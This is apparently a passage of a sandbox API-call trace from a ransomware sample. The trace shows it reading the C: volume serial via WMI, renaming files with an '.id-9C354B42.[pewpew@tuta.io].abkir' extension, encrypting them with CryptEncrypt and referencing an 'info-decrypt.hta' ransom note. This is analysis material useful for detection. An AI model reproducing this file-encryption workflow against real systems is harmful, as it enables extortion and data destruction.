pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0206.515] WbemLocator:IUnknown:Release (This=0xb5bf44) returned 0x1 [0206.515] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5bf64) returned 0x0 [0206.515] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5bf44) returned 0x0 [0206.515] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bf44, pProxy=0x6033584, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0206.515] WbemLocator:IUnknown:Release (This=0xb5bf44) returned 0x2 [0206.515] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x1 [0206.515] CoTaskMemFree (pv=0xbd4a38) [0206.515] WbemLocator:IUnknown:Release (This=0x6027410) returned 0x0 [0206.515] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5bf64) returned 0x0 [0206.515] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0206.517] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0206.518] WbemLocator:IUnknown:AddRef (This=0xb5bf64) returned 0x3 [0206.518] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0206.522] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0206.671] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5bec4) returned 0x0 [0206.671] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bec4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.671] WbemLocator:IUnknown:Release (This=0xb5bec4) returned 0x3 [0206.671] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0206.672] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0206.672] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5bf4c) returned 0x0 [0206.672] WbemLocator:IRpcOptions:Query (in: This=0xb5bf4c, pPrx=0xb5bf64, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0206.672] WbemLocator:IUnknown:Release (This=0xb5bf4c) returned 0x3 [0206.672] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x2 [0206.672] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0206.672] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0206.672] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x6033584) returned 0x0 [0206.672] WbemLocator:IUnknown:AddRef (This=0x6033584) returned 0x4 [0206.672] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x3 [0206.672] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x2 [0206.672] SysStringLen (param_1=0x0) returned 0x0 [0206.672] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a060, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0206.672] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0206.672] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.672] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0206.672] WbemLocator:IUnknown:AddRef (This=0xb5bf64) returned 0x3 [0206.672] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5bf64) returned 0x0 [0206.673] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x3 [0206.673] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x2 [0206.673] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0206.673] WbemDefPath:IWbemPath:GetText (in: This=0x602a060, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.673] IWbemServices:GetObject (in: This=0x6033584, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6028648, ppCallResult=0x0) returned 0x0 [0206.821] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029c70, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0206.821] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0206.821] WbemDefPath:IWbemPath:GetText (in: This=0x6029c70, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.821] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36878e4*=0, plFlavor=0x36878e8*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36878e4*=8, plFlavor=0x36878e8*=0) returned 0x0 [0206.821] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.821] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.821] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36878e4*=8, plFlavor=0x36878e8*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36878e4*=8, plFlavor=0x36878e8*=0) returned 0x0 [0206.821] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.821] SysStringByteLen (bstr="9C354B42") returned 0x10 [0206.821] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpFilePart=0x0) returned 0x4d [0206.821] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x70 [0206.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0206.821] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x34a5f9c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0206.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0206.822] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0206.822] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0206.822] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0206.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0206.823] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32bb9e80, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32bb9e80, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32bb9e80, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0206.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0206.823] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0206.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0206.823] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x3687f88 | out: lpFileInformation=0x3687f88*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72)) returned 1 [0206.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0206.823] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0206.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0206.823] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0206.823] GetFileType (hFile=0x5a0) returned 0x1 [0206.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0206.823] GetFileType (hFile=0x5a0) returned 0x1 [0206.823] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0xc72 [0206.823] ReadFile (in: hFile=0x5a0, lpBuffer=0x37b0bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x37b0bf8*, lpNumberOfBytesRead=0x6c0f4ec*=0xc72, lpOverlapped=0x0) returned 1 [0206.874] CloseHandle (hObject=0x5a0) returned 1 [0206.874] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbe0580) returned 1 [0206.875] CryptGenRandom (in: hProv=0xbe0580, dwLen=0x10, pbBuffer=0x37b1f4c | out: pbBuffer=0x37b1f4c) returned 1 [0207.212] CryptImportKey (in: hProv=0xbe0580, pbData=0x3977880, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7fc10) returned 1 [0207.212] CryptContextAddRef (hProv=0xbe0580, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.212] CryptContextAddRef (hProv=0xbe0580, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.212] CryptDuplicateKey (in: hKey=0xb7fc10, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f110) returned 1 [0207.212] CryptContextAddRef (hProv=0xbe0580, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.212] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x4, pbData=0x3977960*=0x1, dwFlags=0x0) returned 1 [0207.212] CryptSetKeyParam (hKey=0xb7f110, dwParam=0x1, pbData=0x397792c, dwFlags=0x0) returned 1 [0207.212] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3977970*, pdwDataLen=0x6c0f4b8*=0xc80, dwBufLen=0xc80 | out: pbData=0x3977970*, pdwDataLen=0x6c0f4b8*=0xc80) returned 1 [0207.213] CryptEncrypt (in: hKey=0xb7f110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3978614*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x3978614*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0207.214] CryptDestroyKey (hKey=0xb7fc10) returned 1 [0207.214] CryptReleaseContext (hProv=0xbe0580, dwFlags=0x0) returned 1 [0207.214] CryptReleaseContext (hProv=0xbe0580, dwFlags=0x0) returned 1 [0207.214] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpFilePart=0x0) returned 0x4d [0207.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0207.214] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0207.215] GetFileType (hFile=0x5a0) returned 0x1 [0207.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0207.215] GetFileType (hFile=0x5a0) returned 0x1 [0207.216] WriteFile (in: hFile=0x5a0, lpBuffer=0x3978c4c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x3978c4c*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0207.217] CloseHandle (hObject=0x5a0) returned 1 [0207.217] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0207.217] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0207.217] CoTaskMemFree (pv=0xbed438) [0207.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0207.217] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0207.218] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0207.218] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0207.218] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.219] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6027360) returned 0x0 [0207.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027360, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0207.219] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027360, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x602a1b0) returned 0x0 [0207.219] WbemDefPath:IUnknown:Release (This=0x6027360) returned 0x0 [0207.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x602a1b0) returned 0x0 [0207.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0207.219] WbemDefPath:IUnknown:AddRef (This=0x602a1b0) returned 0x3 [0207.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0207.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0207.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0x66ccd28) returned 0x0 [0207.219] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccd28, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.219] WbemDefPath:IUnknown:Release (This=0x66ccd28) returned 0x3 [0207.219] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0207.219] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0207.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0207.220] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x2 [0207.220] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x1 [0207.220] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0207.220] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0207.220] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a1b0, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x602a1b0) returned 0x0 [0207.220] WbemDefPath:IUnknown:AddRef (This=0x602a1b0) returned 0x3 [0207.220] WbemDefPath:IUnknown:Release (This=0x602a1b0) returned 0x2 [0207.220] WbemDefPath:IWbemPath:SetText (This=0x602a1b0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a1b0, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0207.220] WbemDefPath:IWbemPath:GetText (in: This=0x602a1b0, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: 